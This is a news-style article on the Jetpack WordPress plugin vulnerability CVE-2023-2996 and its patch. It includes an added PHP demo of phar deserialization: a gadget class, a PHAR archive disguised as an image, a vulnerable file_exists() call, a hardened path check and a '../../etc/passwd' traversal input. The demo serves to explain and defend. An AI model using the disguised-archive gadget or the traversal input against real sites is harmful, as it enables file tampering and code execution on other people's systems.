CVE-2023-2996: A Critical Vulnerability in the Jetpack WordPress Plugin


Automattic, the maintainer of the widely used Jetpack WordPress plugin, has alerted its user base to a critical security vulnerability, CVE-2023-2996. Jetpack, an all-in-one plugin for the security, performance, and management of WordPress sites, has more than five million active installations.

The vulnerability was found during an internal security audit and affects Jetpack versions before 12.1.1. The root cause is insufficient validation in the plugin's file upload API. As Jeremy Herve, Automattic Developer Relations Engineer, explained: “This vulnerability could be used by authors on a site to manipulate any files in the WordPress installation.”


The flaw is serious: anyone with ‘author’ level access or above can modify or delete files in the WordPress installation, and a file-write primitive of that kind can potentially be chained into remote code execution, for example through ‘phar deserialization’. Such chains are uncommon, but the outcome for an affected site ranges from data loss or corruption to a complete takeover, and millions of sites run the plugin.
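The chain the paragraph names, as an added example that is not Jetpack's or Automattic's code and does not reproduce the actual CVE-2023-2996 code path: a hypothetical gadget class (LogFlusher), a PHAR archive built around it and disguised as an image, the unsafe file_exists() call that makes PHP parse the archive, and a hardened path check that refuses stream wrappers and traversal. All file names and paths are constructed for the demo. One caveat a practitioner should know: PHP 8.0 stopped unserializing PHAR metadata automatically on file operations, so the vulnerable_exists() path only fires the gadget on PHP 7.x; the hardening is still worth having because getMetadata() and other wrappers (php://, data://) remain reachable.

```php
<?php
declare(strict_types=1);

// Added example, not Jetpack code. Demonstrates why "an author can write files"
// can end in object deserialization, and how to harden path handling.
// LogFlusher is a hypothetical gadget class; every path below is made up.

class LogFlusher {
    public string $path = '';
    public string $data = '';
    // Gadget: runs when the unserialized object is destroyed, which happens
    // automatically at the end of the request that touched the PHAR.
    public function __destruct() {
        file_put_contents($this->path, $this->data);
    }
}

// Builds a PHAR whose metadata is a serialized LogFlusher and renames it so it
// passes as an image. Must be run with: php -d phar.readonly=0 demo.php
// (phar.readonly cannot be switched off at runtime).
function build_demo_phar(string $disguisedPath): void {
    if (ini_get('phar.readonly')) {
        fwrite(STDERR, "run with: php -d phar.readonly=0\n");
        exit(1);
    }
    $tmp  = $disguisedPath . '.phar';          // the Phar class requires the .phar suffix
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'x');
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // image-looking magic bytes
    $g = new LogFlusher();
    $g->path = sys_get_temp_dir() . '/phar-demo-pwned.txt';
    $g->data = "gadget executed\n";
    $phar->setMetadata($g);                    // serialized into the archive
    $phar->stopBuffering();
    rename($tmp, $disguisedPath);
}

// VULNERABLE: a user-controlled path goes straight to file_exists().
// "phar:///uploads/avatar.jpg/x.txt" makes PHP open the archive; on PHP < 8.0
// the metadata is unserialized right here, instantiating LogFlusher.
function vulnerable_exists(string $userPath): bool {
    return file_exists($userPath);
}

// HARDENED: reject any stream wrapper, anchor the path under $baseDir, and
// refuse anything that canonicalises outside it.
function hardened_exists(string $userPath, string $baseDir): bool {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userPath)) {
        return false;                          // phar://, php://, data://, ftp://, ...
    }
    if (strpos($userPath, "\0") !== false) {
        return false;                          // NUL bytes truncate or throw
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath); // also resolves ../
    if ($real === false) {
        return false;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                          // escaped the base directory
    }
    return is_file($real);
}

// Demo (CLI only).
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/phar-demo';
    @mkdir($dir);
    $img = $dir . '/avatar.jpg';
    build_demo_phar($img);

    $bad = 'phar://' . $img . '/x.txt';
    var_dump(vulnerable_exists($bad));                    // true; gadget loaded on PHP < 8.0
    var_dump(hardened_exists($bad, $dir));                // false: wrapper rejected
    var_dump(hardened_exists('avatar.jpg', $dir));        // true: plain file under base
    var_dump(hardened_exists('../../etc/passwd', $dir));  // false: traversal
    // On PHP 7.x, LogFlusher::__destruct writes phar-demo-pwned.txt at shutdown.
}
```

The hardened check deliberately builds the path from a trusted base rather than trusting the caller's string: a wrapper prefix is only honoured at the very start of a path, and realpath() plus a prefix comparison catches both symlink tricks and `../` escapes. Rejecting the `scheme://` form outright is a second layer in case a later refactor drops the base-directory join.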

In response to this alarming revelation, Automattic promptly rolled out a security patch, Jetpack 12.1.1. This patch is currently being automatically applied to all WordPress websites using the plugin, a measure designed to shield websites from potential exploitation.

Herve added: “We have no evidence that this vulnerability has been exploited in the wild. However, now that the update has been released, it is possible that someone will try to take advantage of this vulnerability.”

Given the potential impact, all Jetpack users are strongly urged to update to 12.1.1 or later as soon as possible. For sites that cannot move to the current release, Automattic worked with the WordPress.org Security Team to release patched versions of every major Jetpack version since 2.0, so a site can stay on its current branch and still receive the fix.

To give users time to update, Automattic will publish the proof of concept (PoC) on July 4, 2023. The delay gives site owners a window to update Jetpack and remove the CVE-2023-2996 vulnerability before exploitation details become widely known.